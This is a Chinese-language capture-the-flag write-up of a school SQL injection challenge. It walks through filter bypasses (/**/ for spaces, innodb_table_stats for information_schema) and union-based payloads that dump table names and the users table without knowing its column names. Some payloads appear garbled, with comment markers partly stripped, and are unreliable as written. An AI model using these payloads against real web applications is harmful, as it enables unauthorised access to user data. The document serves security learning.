原来我们学校之前的一道很有意思的sql题目
刚好最近在学手注(之前直接sqlmap一把梭)
拿来练练手
按照流程先注册账号,现在还不能判断是sql注入
发布个广告试试
此时还不知道是什么意思
发布一个试试
看到这里就很明显了,发布这个广告的过程就存在sql注入
多次尝试,发现是因为里面含有过滤词,过滤了or # –+和空格
空格可以用/**/来代替
–+注释符的话就用单引号闭合就ok了
or被过滤了的话就不能使用order by,information_schema
先联合注入检查列数
-1’union//select//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22′
2,3位有回显
那就拿database()去占位爆数据库
1’//union//select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22′
爆表名,这里不能使用or,所以这里使用的是新的payload
1’//union//select//1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22//from//mysql.innodb_table_stats//where/**/database_name=”web1″‘
因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。(select//group_concat(table_name)//from//mysql.innodb_table_stats//where/**/database_name=database())
payload:-1’//union//select//1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22//from//mysql.innodb_table_stats//where/**/database_name=”web1″‘
这里存在一个问题,我们只知道Innodb的表名和数据库名,列名不知道。
这里有一个语法可以在不知道原列名 的情况下查询特定的列名–我们自己定义名字
我们可以给表修改列名,只要知道表的具体列数;1,2,3 as a 注:第二种只把最后一项3替换为`a`
select `5` from (select 1,2,3,4,5 union select * from t2)a;
等价于
select b from (select 1,2,3,4,5 as b union select * from t2)a;
最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select////from/*/users)k),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22′
参考文章
发表评论